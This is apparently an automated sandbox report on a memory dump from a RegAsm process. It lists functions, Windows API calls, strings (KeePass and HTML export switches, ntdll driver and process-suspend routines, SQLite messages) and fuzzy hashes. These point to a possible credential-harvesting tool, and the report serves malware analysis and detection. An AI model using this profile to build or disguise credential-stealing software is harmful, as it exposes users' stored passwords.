API String ID: 4233704886-1717621600
Opcode ID: 7e01f0dee03851588a79a4a26fa611e8dffd0452dbc09a85c2cc2e741f239264
Instruction ID: f8a1ad7f3386c3a0ca67e8408a701755caa4d882ef8d2f884b3bc60851bd4b4d
Opcode Fuzzy Hash: 7e01f0dee03851588a79a4a26fa611e8dffd0452dbc09a85c2cc2e741f239264
Instruction Fuzzy Hash: F5217432900118BFEF11BFA6DC46CDFBB79DF41368B22006FF804A2161DA799E91995D

Function 004125F8 Relevance: 21.1, APIs: 7, Strings: 7, Instructions: 70COMMON

Download Yara Rule

APIs

_wcsicmp.MSVCRT ref: 004125FE
_wcsicmp.MSVCRT ref: 00412613

Strings

/sverhtml, xrefs: 0041260E
/scomma, xrefs: 00412662
/sxml, xrefs: 00412623
/skeepass, xrefs: 00412677
/stab, xrefs: 00412638
/stabular, xrefs: 0041264D
/shtml, xrefs: 004125F9

Memory Dump Source

Source File: 00000012.00000002.479067861.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_RegAsm.jbxd

Similarity

API ID: _wcsicmp
String ID: /scomma$/shtml$/skeepass$/stab$/stabular$/sverhtml$/sxml
API String ID: 2081463915-1959339147
Opcode ID: 28c2ebe8ae336333f434d0f7201133c37a7c95e7bcc6e3a748ef2c38aa05b661
Instruction ID: 8733bd8b557f913067c5021fbfe18d0583d9fd94efe92a6f612d034962822ca0
Opcode Fuzzy Hash: 28c2ebe8ae336333f434d0f7201133c37a7c95e7bcc6e3a748ef2c38aa05b661
Instruction Fuzzy Hash: A401843328931228FA2538663D07F834F48CB52BBBF32405BF800D81C6FE8C4565605E

Function 00412172 Relevance: 19.7, APIs: 13, Instructions: 189windowCOMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 004121FF
GetDeviceCaps.GDI32(00000000,0000005A), ref: 0041220A
ReleaseDC.USER32(00000000,00000000), ref: 0041221F
SetBkMode.GDI32(?,00000001), ref: 00412232
SetTextColor.GDI32(?,00FF0000), ref: 00412240
SelectObject.GDI32(?,?), ref: 00412251
DrawTextExW.USER32(?,?,000000FF,?,00000024,?), ref: 00412285
SelectObject.GDI32(00000014,00000005), ref: 00412291

Part of subcall function 00411FC6: GetCursorPos.USER32(?), ref: 00411FD0
Part of subcall function 00411FC6: GetSubMenu.USER32(?,00000000), ref: 00411FDE
Part of subcall function 00411FC6: TrackPopupMenu.USER32(00000000,00000002,?,?,00000000,?,00000000), ref: 0041200F

GetModuleHandleW.KERNEL32(00000000), ref: 004122AC
LoadCursorW.USER32(00000000,00000067), ref: 004122B5
SetCursor.USER32(00000000), ref: 004122BC
PostMessageW.USER32(?,00000428,00000000,00000000), ref: 00412304
memcpy.MSVCRT ref: 0041234D

Memory Dump Source

Source File: 00000012.00000002.479067861.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_RegAsm.jbxd

Similarity

API ID: Cursor$MenuObjectSelectText$CapsColorDeviceDrawHandleLoadMessageModeModulePopupPostReleaseTrackmemcpy
String ID:
API String ID: 1700100422-0
Opcode ID: da24f667188ca395770274d48ae20aaa805e07b53c3ccbe50e1108a3d75e9f91
Instruction ID: eb413d4c014922f01c1be241ee45634b3e5b5e29cfe5fc1015c733cb557b7a75
Opcode Fuzzy Hash: da24f667188ca395770274d48ae20aaa805e07b53c3ccbe50e1108a3d75e9f91
Instruction Fuzzy Hash: 0F61D331600109AFDB149F74CE89BEA77A5BB45300F10052AFA25D7291DBBC9CB1DB59

Function 004111C1 Relevance: 18.1, APIs: 12, Instructions: 113COMMON

Download Yara Rule

APIs

GetClientRect.USER32(?,?), ref: 004111E0
GetWindowRect.USER32(?,?), ref: 004111F6
GetWindowRect.USER32(?,?), ref: 0041120C
GetDlgItem.USER32(00000000,0000040D), ref: 00411246
GetWindowRect.USER32(00000000), ref: 0041124D
MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0041125D
BeginDeferWindowPos.USER32(00000004), ref: 00411281
DeferWindowPos.USER32(?,?,00000000,00000000,00000000,?,?,00000004), ref: 004112A4
DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000006), ref: 004112C3
DeferWindowPos.USER32(?,?,00000000,00000000,000000DC,?,?,00000004), ref: 004112EE
DeferWindowPos.USER32(?,00000000,00000000,00000000,?,?,000000DC,00000004), ref: 00411306
EndDeferWindowPos.USER32(?), ref: 0041130B

Memory Dump Source

Source File: 00000012.00000002.479067861.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_RegAsm.jbxd

Similarity

API ID: Window$Defer$Rect$BeginClientItemPoints
String ID:
API String ID: 552707033-0
Opcode ID: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
Instruction ID: 1a89c9de14f4e003cb1acc22e2fe5cfe68aec74c13575a54a2aa846d798aa5ff
Opcode Fuzzy Hash: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
Instruction Fuzzy Hash: 3B41D375900209FFEB11DFA8DD89FEEBBBAFB48300F104469F655A61A0C771AA50DB14

Function 00414621 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 99COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 0041464F
memset.MSVCRT ref: 00414664
_snwprintf.MSVCRT ref: 0041467E
_snwprintf.MSVCRT ref: 0041469D
memset.MSVCRT ref: 004146CF
memset.MSVCRT ref: 004146E4
memset.MSVCRT ref: 004146F9
_snwprintf.MSVCRT ref: 00414713
_snwprintf.MSVCRT ref: 00414730

Strings

%%0.%df, xrefs: 00414671, 00414706

Memory Dump Source

Source File: 00000012.00000002.479067861.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_RegAsm.jbxd

Similarity

API ID: memset$_snwprintf
String ID: %%0.%df
API String ID: 3473751417-763548558
Opcode ID: d3ed19b3c5d3f5d27fcb945595af099acb5609e53fc24cbfd77fa4eb0abb8f2a
Instruction ID: e3e507119e413e1699737691dcc770ce903c50d69a4f0c7cc4f670013a5326e5
Opcode Fuzzy Hash: d3ed19b3c5d3f5d27fcb945595af099acb5609e53fc24cbfd77fa4eb0abb8f2a
Instruction Fuzzy Hash: 2D318F71800129BBEB20DF95CC85FEB77BCFF49304F0104EAB509A2155E7349A94CBA9

Function 004060A4 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 97timewindowCOMMON

Download Yara Rule

APIs

SetTimer.USER32(?,00000041,00000064,00000000), ref: 004060C7
KillTimer.USER32(?,00000041), ref: 004060D7
KillTimer.USER32(?,00000041), ref: 004060E8
GetTickCount.KERNEL32 ref: 0040610B
GetParent.USER32(?), ref: 00406136
SendMessageW.USER32(00000000), ref: 0040613D
BeginDeferWindowPos.USER32(00000004), ref: 0040614B
EndDeferWindowPos.USER32(00000000), ref: 0040619B
InvalidateRect.USER32(?,?,00000001), ref: 004061A7

Strings

A, xrefs: 004060F3

Memory Dump Source

Source File: 00000012.00000002.479067861.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_RegAsm.jbxd

Similarity

API ID: Timer$DeferKillWindow$BeginCountInvalidateMessageParentRectSendTick
String ID: A
API String ID: 2892645895-3554254475
Opcode ID: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
Instruction ID: 3d646c34c65c30a23a549f03b0efc12359fcfb722ff8df3f2fd47db5f06942f8
Opcode Fuzzy Hash: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
Instruction Fuzzy Hash: 67318F75240304BBEB205F62DC85F6A7B6ABB44742F018539F3067A5E1C7F998A18B58

Function 0041352F Relevance: 17.5, APIs: 1, Strings: 9, Instructions: 41COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542

Strings

NtLoadDriver, xrefs: 0041355B
NtQueryObject, xrefs: 004135A3
NtSuspendProcess, xrefs: 004135B5
ntdll.dll, xrefs: 0041353D
NtQuerySystemInformation, xrefs: 0041354E
NtUnloadDriver, xrefs: 0041356D
NtQuerySymbolicLinkObject, xrefs: 00413591
NtResumeProcess, xrefs: 004135C7
NtOpenSymbolicLinkObject, xrefs: 0041357F

Memory Dump Source

Source File: 00000012.00000002.479067861.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_RegAsm.jbxd

Similarity

API ID: HandleModule
String ID: NtLoadDriver$NtOpenSymbolicLinkObject$NtQueryObject$NtQuerySymbolicLinkObject$NtQuerySystemInformation$NtResumeProcess$NtSuspendProcess$NtUnloadDriver$ntdll.dll
API String ID: 4139908857-2887671607
Opcode ID: 57b3ef5f97466978e1990f74adf29af07ff290b7ce4571feabf87054e0031f76
Instruction ID: 8dd6b0f06cc06780b82abcfa5335c49c30c65db347d43124f897848efd9f6b7c
Opcode Fuzzy Hash: 57b3ef5f97466978e1990f74adf29af07ff290b7ce4571feabf87054e0031f76
Instruction Fuzzy Hash: 8C015E75D48324AACB339F75AD09A053FB1EF04797B1004B7A80492266DAF9815CDE4C

Function 0040C084 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 110stringCOMMON

Download Yara Rule

APIs

Part of subcall function 0040A32D: SetFilePointer.KERNEL32(0040C2BF,?,00000000,00000000,?,0040C0C5,00000000,00000000,?,00000020,?,0040C255,?,?,*.*,0040C2BF), ref: 0040A33A

GetFileSize.KERNEL32(00000000,00000000), ref: 0040C0D4

Part of subcall function 0040BFF3: _memicmp.MSVCRT ref: 0040C00D
Part of subcall function 0040BFF3: memcpy.MSVCRT ref: 0040C024

memcpy.MSVCRT ref: 0040C11B
strchr.MSVCRT ref: 0040C140
strchr.MSVCRT ref: 0040C151
_strlwr.MSVCRT ref: 0040C15F
memset.MSVCRT ref: 0040C17A
CloseHandle.KERNEL32(00000000), ref: 0040C1C7

Strings

4, xrefs: 0040C0C8
h, xrefs: 0040C12C

Memory Dump Source

Source File: 00000012.00000002.479067861.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_RegAsm.jbxd

Similarity

API ID: Filememcpystrchr$CloseHandlePointerSize_memicmp_strlwrmemset
String ID: 4$h
API String ID: 4019544885-1856150674
Opcode ID: 74984e11edfdd2211d0d35a95e6cfe2b897958e94349246af9e5f94d48ef065d
Instruction ID: ad7b68c589633d756b108d453181f98220e50dbf4ed18f1a1dc8c2c6e1bbf79d
Opcode Fuzzy Hash: 74984e11edfdd2211d0d35a95e6cfe2b897958e94349246af9e5f94d48ef065d
Instruction Fuzzy Hash: F531C2B2800218FEEB20EB54CC85EEE73BCEF05354F14416AF508A6181D7389F558FA9

Function 0040D2AB Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 101windowCOMMON

Download Yara Rule

APIs

GetMenuItemCount.USER32(?), ref: 0040D2C1
memset.MSVCRT ref: 0040D2E5
GetMenuItemInfoW.USER32 ref: 0040D320
memset.MSVCRT ref: 0040D34F
wcschr.MSVCRT ref: 0040D35B
wcscat.MSVCRT ref: 0040D3B6
ModifyMenuW.USER32(?,?,00000400,?,?), ref: 0040D3D2

Strings

0, xrefs: 0040D300
6, xrefs: 0040D30B

Memory Dump Source

Source File: 00000012.00000002.479067861.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_RegAsm.jbxd

Similarity

API ID: Menu$Itemmemset$CountInfoModifywcscatwcschr
String ID: 0$6
API String ID: 4066108131-3849865405
Opcode ID: 0289309123c9ab86839131df51d1afc7e9f627d47cda6d3754f054bafba8353e
Instruction ID: 23fd2219eb4cf2a86962fa47610fb6a66e7712bfbd77636794901fa2ff6d3352
Opcode Fuzzy Hash: 0289309123c9ab86839131df51d1afc7e9f627d47cda6d3754f054bafba8353e
Instruction Fuzzy Hash: 1C317C72808344AFDB209F95D84499FB7E8FF84314F00493EFA48A2291D775D949CB5B

Function 004082C7 Relevance: 15.2, APIs: 10, Instructions: 229COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 004082EF

Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF

memset.MSVCRT ref: 00408362
memset.MSVCRT ref: 00408377

Memory Dump Source

Source File: 00000012.00000002.479067861.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_RegAsm.jbxd

Similarity

API ID: memset$ByteCharMultiWide
String ID:
API String ID: 290601579-0
Opcode ID: 2c5b7af1b6ad7fa84976a25c4c1a6b62738b238711a472a87ec5ace72f6ab842
Instruction ID: eff1c4cb9ad8ed09cf65616da307521f953f8cb6273bc8e87bbfe44e88666a06
Opcode Fuzzy Hash: 2c5b7af1b6ad7fa84976a25c4c1a6b62738b238711a472a87ec5ace72f6ab842
Instruction Fuzzy Hash: E1716C72E0421DAFEF10EFA1EC82AEDB7B9EF04314F14406FE104B6191EB795A458B59

Function 0040A45A Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 65COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 0040A47B
_snwprintf.MSVCRT ref: 0040A4AE
wcslen.MSVCRT ref: 0040A4BA
memcpy.MSVCRT ref: 0040A4D2
wcslen.MSVCRT ref: 0040A4E0
memcpy.MSVCRT ref: 0040A4F3

Strings

%s (%s), xrefs: 0040A4A3
YV@, xrefs: 0040A480, 0040A4D7, 0040A4F8

Memory Dump Source

Source File: 00000012.00000002.479067861.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_RegAsm.jbxd

Similarity

API ID: memcpywcslen$_snwprintfmemset
String ID: %s (%s)$YV@
API String ID: 3979103747-598926743
Opcode ID: 2040f1418fb7f55927111411806f4302e3b16a8f1d7874ce907b9bb2b5999412
Instruction ID: 06bfc13611ed198a4270a5cd43788582667178ba612a9453d6f3368808cd6753
Opcode Fuzzy Hash: 2040f1418fb7f55927111411806f4302e3b16a8f1d7874ce907b9bb2b5999412
Instruction Fuzzy Hash: 31216F72900219BBDF21DF55CC45D8BB7B8BF04318F018466E948AB106DB74EA188BD9

Function 0040A661 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 52librarywindowCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(netmsg.dll,00000000,00000002,?,?,?,?,00409764,?), ref: 0040A686
FormatMessageW.KERNEL32(00001100,00000000,?,00000400,?,00000000,00000000,?,?,?,?,00409764,?), ref: 0040A6A4
wcslen.MSVCRT ref: 0040A6B1
wcscpy.MSVCRT ref: 0040A6C1
LocalFree.KERNEL32(?,?,00000400,?,00000000,00000000,?,?,?,?,00409764,?), ref: 0040A6CB
wcscpy.MSVCRT ref: 0040A6DB

Strings

netmsg.dll, xrefs: 0040A681
Unknown Error, xrefs: 0040A6D3

Memory Dump Source

Source File: 00000012.00000002.479067861.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_RegAsm.jbxd

Similarity

API ID: wcscpy$FormatFreeLibraryLoadLocalMessagewcslen
String ID: Unknown Error$netmsg.dll
API String ID: 2767993716-572158859
Opcode ID: 6af7a682c2b6d94d5c313714e0e524a7557e97864fcb7fd89b068039d1905f7d
Instruction ID: f30f617898fcbe25dfcd40b25f3134c3ee1324ef56ff669fd92f7ad18b117fee
Opcode Fuzzy Hash: 6af7a682c2b6d94d5c313714e0e524a7557e97864fcb7fd89b068039d1905f7d
Instruction Fuzzy Hash: 77014772104214BFE7151B61EC46E9F7B3DEF06795F24043AF902B10D0DA7A5E10D69D

Function 0042F5F4 Relevance: 13.8, APIs: 2, Strings: 7, Instructions: 250COMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 0042F6B8
memset.MSVCRT ref: 0042F6F3

Strings

cannot ATTACH database within transaction, xrefs: 0042F663
attached databases must use the same text encoding as main database, xrefs: 0042F76F
out of memory, xrefs: 0042F865
unable to open database: %s, xrefs: 0042F84E
database %s is already in use, xrefs: 0042F6C5
database is already attached, xrefs: 0042F721
too many attached databases - max %d, xrefs: 0042F64D

Memory Dump Source

Source File: 00000012.00000002.479067861.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_RegAsm.jbxd

Similarity

API ID: memcpymemset
String ID: attached databases must use the same text encoding as main database$cannot ATTACH database within transaction$database %s is already in use$database is already attached$out of memory$too many attached databases - max %d$unable to open database: %s
API String ID: 1297977491-2001300268
Opcode ID: fafdf879e702536ae0a8da4e3c7de2ba30e48f0de6d41113ccb8534cd7e7e00e
Instruction ID: 2d624c67d108d3170f37657fe85980b6deaf3b4166a4b31ce602698a835437d0
Opcode Fuzzy Hash: fafdf879e702536ae0a8da4e3c7de2ba30e48f0de6d41113ccb8534cd7e7e00e
Instruction Fuzzy Hash: 4791C131B00315AFDB10DF65E481B9ABBB0AF44318F94807FE8059B252D778E949CB59

Function 0040D134 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 104COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
wcscpy.MSVCRT ref: 0040D1B5

Part of subcall function 0040D626: memset.MSVCRT ref: 0040D639
Part of subcall function 0040D626: _itow.MSVCRT ref: 0040D647

wcslen.MSVCRT ref: 0040D1D3
GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
LoadStringW.USER32(00000000,?,?), ref: 0040D20C
memcpy.MSVCRT ref: 0040D24C

Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D0CC
Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D0EA
Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D108
Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D126

Strings

strings, xrefs: 0040D1AB

Memory Dump Source

Source File: 00000012.00000002.479067861.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_RegAsm.jbxd

Similarity

API ID: ??2@$HandleModule$LoadString_itowmemcpymemsetwcscpywcslen
String ID: strings
API String ID: 3166385802-3030018805
Opcode ID: 1ff794482afb279d074c0027ae841dfa169eb318e5c6685fac8801d3cb652815
Instruction ID: f4589d763452722e7ce024d248fd6f149fceb83749f413ad0df853fa0cd60d20
Opcode Fuzzy Hash: 1ff794482afb279d074c0027ae841dfa169eb318e5c6685fac8801d3cb652815
Instruction Fuzzy Hash: 78418D75D003109BD7369FA8ED809263365FF48306700047EE942972A7DEB9E886CB5D

Function 004044A4 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 52librarywindowCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(comctl32.dll), ref: 004044C3
FreeLibrary.KERNEL32(00000000), ref: 004044E9
MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514

Strings

InitCommonControlsEx, xrefs: 004044CF
comctl32.dll, xrefs: 004044AC
Error, xrefs: 00404509
Error: Cannot load the common control classes., xrefs: 0040450E

Memory Dump Source

Source File: 00000012.00000002.479067861.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_RegAsm.jbxd

Similarity

API ID: Library$FreeLoadMessage
String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
API String ID: 3897320386-317687271
Opcode ID: 4451af1fa5a3c13e403cd0bd9a94ec580510088b32cd85f0031bb893d40152de
Instruction ID: 703d86131c3dcb59aab6256491fb2853d543806c906e0642a055f98632e98cc8
Opcode Fuzzy Hash: 4451af1fa5a3c13e403cd0bd9a94ec580510088b32cd85f0031bb893d40152de
Instruction Fuzzy Hash: B201D6757502217BE7112FB69C49F7B7A9CFF82749B000035E601E2180EAB8D901926D

Function 0041B7D9 Relevance: 12.3, APIs: 6, Strings: 2, Instructions: 269COMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 0041B911
memcpy.MSVCRT ref: 0041B923
memcpy.MSVCRT ref: 0041B93B
memcpy.MSVCRT ref: 0041B958
memcpy.MSVCRT ref: 0041B970
memset.MSVCRT ref: 0041BA3D

Strings

-journal, xrefs: 0041B935
-wal, xrefs: 0041B96A

Memory Dump Source

Source File: 00000012.00000002.479067861.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_RegAsm.jbxd

Similarity

API ID: memcpy$memset
String ID: -journal$-wal
API String ID: 438689982-2894717839
Opcode ID: a23b5b0b71c70c88a774746b26d285d432c8b869e41e999d2c4a765dbb53c531
Instruction ID: 9370885b9bf0560d7aa4477d28ce4586d78acc2621466e64c0ac2b95c9c5353a
Opcode Fuzzy Hash: a23b5b0b71c70c88a774746b26d285d432c8b869e41e999d2c4a765dbb53c531
Instruction Fuzzy Hash: CBA1EFB1A04606EFCB14DF69C8417DAFBB4FF04314F14826EE46897381D738AA95CB99

Function 0041881C Relevance: 12.1, APIs: 8, Instructions: 70timeCOMMON

Download Yara Rule

APIs

GetSystemTime.KERNEL32(?), ref: 00418836
memcpy.MSVCRT ref: 00418845
GetCurrentProcessId.KERNEL32 ref: 00418856
memcpy.MSVCRT ref: 00418869
GetTickCount.KERNEL32 ref: 0041887D
memcpy.MSVCRT ref: 00418890
QueryPerformanceCounter.KERNEL32(?), ref: 004188A6
memcpy.MSVCRT ref: 004188B6

Memory Dump Source

Source File: 00000012.00000002.479067861.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_RegAsm.jbxd

Similarity

API ID: memcpy$CountCounterCurrentPerformanceProcessQuerySystemTickTime
String ID:
API String ID: 4218492932-0
Opcode ID: 5b3bc6f1ade46934c27ca3d947f7b8c79a38ab90bf8452c3a07df30f33fc823a
Instruction ID: a427a134a5f43ecd7f569dc5a6dbdc76404a49e7a1b6a3986382666b5299f542
Opcode Fuzzy Hash: 5b3bc6f1ade46934c27ca3d947f7b8c79a38ab90bf8452c3a07df30f33fc823a
Instruction Fuzzy Hash: 141184B39001286BEB00AFA5DC899DEB7ACEB1A210F454837FA15D7144E634E2488795

Function 0044A7C0 Relevance: 10.7, APIs: 6, Strings: 1, Instructions: 203COMMON

Download Yara Rule

APIs

Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6EB
Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6FB
Part of subcall function 0044A6E0: memcpy.MSVCRT ref: 0044A75D
Part of subcall function 0044A6E0: memcpy.MSVCRT ref: 0044A7AA

memcpy.MSVCRT ref: 0044A8BF
memcpy.MSVCRT ref: 0044A90C
memcpy.MSVCRT ref: 0044A988

Part of subcall function 0044A3F0: memcpy.MSVCRT ref: 0044A422
Part of subcall function 0044A3F0: memcpy.MSVCRT ref: 0044A46E

memcpy.MSVCRT ref: 0044A9D8
memcpy.MSVCRT ref: 0044AA19
memcpy.MSVCRT ref: 0044AA4A

Strings

gj, xrefs: 0044A7D9

Memory Dump Source

Source File: 00000012.00000002.479067861.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_RegAsm.jbxd

Similarity

API ID: memcpy$memset
String ID: gj
API String ID: 438689982-4203073231
Opcode ID: 85f25b7c526aeaf15c340c15a86b7b9b8fd097bc53de23dcb8424ba1f871f8ae
Instruction ID: 6893d0ddfb5a5ce8f484e87047b84ef7868cce638272d7e844f470f6f9013d76
Opcode Fuzzy Hash: 85f25b7c526aeaf15c340c15a86b7b9b8fd097bc53de23dcb8424ba1f871f8ae
Instruction Fuzzy Hash: 2E71D6F39083449BE310EF25D84059FB7E9ABD5348F050E2EF88997205E639DA19C797

Function 0040D7A7 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 79windowCOMMON

Download Yara Rule

APIs

GetMenuItemCount.USER32(?), ref: 0040D7BD
memset.MSVCRT ref: 0040D7DC
GetMenuItemInfoW.USER32 ref: 0040D818
wcschr.MSVCRT ref: 0040D830

Strings

6, xrefs: 0040D7FF
0, xrefs: 0040D7F7

Memory Dump Source

Source File: 00000012.00000002.479067861.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_RegAsm.jbxd

Similarity

API ID: ItemMenu$CountInfomemsetwcschr
String ID: 0$6
API String ID: 2029023288-3849865405
Opcode ID: 391c38dbba120c466a74104014748036d1901581f04e0d37adf97963ab497765
Instruction ID: 35075b9e4b0179943f9cc9fcb0392e174ec026107191ec1d659f896637aaeb19
Opcode Fuzzy Hash: 391c38dbba120c466a74104014748036d1901581f04e0d37adf97963ab497765
Instruction Fuzzy Hash: A321AB32905300ABD720AF91DC8599FB7B8FB85754F000A3FF954A2280E779D944CB9A

Function 0040541F Relevance: 10.6, APIs: 5, Strings: 2, Instructions: 78COMMON

Download Yara Rule

APIs

Part of subcall function 004055A4: GetLastError.KERNEL32(?,00000000,00405522,?,?,?,00000000,00000000,?,00408E1C,?,?,00000060,00000000), ref: 004055B9

memset.MSVCRT ref: 00405455
memset.MSVCRT ref: 0040546C
memset.MSVCRT ref: 00405483
memcpy.MSVCRT ref: 00405498
memcpy.MSVCRT ref: 004054AD

Strings

6, xrefs: 004054C3
\, xrefs: 004054BB

Memory Dump Source

Source File: 00000012.00000002.479067861.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_RegAsm.jbxd

Similarity

API ID: memset$memcpy$ErrorLast
String ID: 6$\
API String ID: 404372293-1284684873
Opcode ID: c52bb6eee22109a6197316720abdd8282c22b56b49716a990b3966b2803c4fd3
Instruction ID: af38dfd20ac5a94c77b7ead9800c7a3089711b207e9f3183cf3669ed78e53beb
Opcode Fuzzy Hash: c52bb6eee22109a6197316720abdd8282c22b56b49716a990b3966b2803c4fd3
Instruction Fuzzy Hash: 572141B280112CBBDF11AF99DC45EDF7BACDF15304F0080A6B509E2156E6398B988F65

Function 0041851E Relevance: 10.6, APIs: 7, Instructions: 67sleepCOMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNEL32(00000000), ref: 0041854F
GetLastError.KERNEL32 ref: 0041855C
Sleep.KERNEL32(00000064), ref: 00418571
GetFileAttributesA.KERNEL32(00000000), ref: 00418581
GetLastError.KERNEL32 ref: 0041858E
Sleep.KERNEL32(00000064), ref: 004185A3
??3@YAXPAX@Z.MSVCRT ref: 004185AC

Memory Dump Source

Source File: 00000012.00000002.479067861.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_RegAsm.jbxd

Similarity

API ID: AttributesErrorFileLastSleep$??3@
String ID:
API String ID: 1040972850-0
Opcode ID: 609e8585d10487ae529d0e45f017ab7cc050c6f090476510ecc0468bc0539608
Instruction ID: d61f765991b085217c17e58d7c3851c8d0f597f546fc635256e60a728691d00d
Opcode Fuzzy Hash: 609e8585d10487ae529d0e45f017ab7cc050c6f090476510ecc0468bc0539608
Instruction Fuzzy Hash: A011C639540624BBC61027716CC89BE3676E75B335B210A2EFA22912D0DF6C4CC2557E

Function 0040A06C Relevance: 10.6, APIs: 7, Instructions: 63timeCOMMON

Download Yara Rule

APIs

FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A088
GetDateFormatW.KERNEL32(00000400,00000001,000007C1,00000000,?,00000080), ref: 0040A0B4
GetTimeFormatW.KERNEL32(00000400,00000000,000007C1,00000000,?,00000080), ref: 0040A0C9
wcscpy.MSVCRT ref: 0040A0D9
wcscat.MSVCRT ref: 0040A0E6
wcscat.MSVCRT ref: 0040A0F5
wcscpy.MSVCRT ref: 0040A107

Memory Dump Source

Source File: 00000012.00000002.479067861.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_RegAsm.jbxd

Similarity

API ID: Time$Formatwcscatwcscpy$DateFileSystem
String ID:
API String ID: 1331804452-0
Opcode ID: f8aa036cb335485c7d93aed18039143b3373b2c7e44f2a4205c7e838cddf6ff7
Instruction ID: 70f18838178cd2dbc623065d80ced1a8b0c5b1489d8a310e1ceaee9f81d034e1
Opcode Fuzzy Hash: f8aa036cb335485c7d93aed18039143b3373b2c7e44f2a4205c7e838cddf6ff7
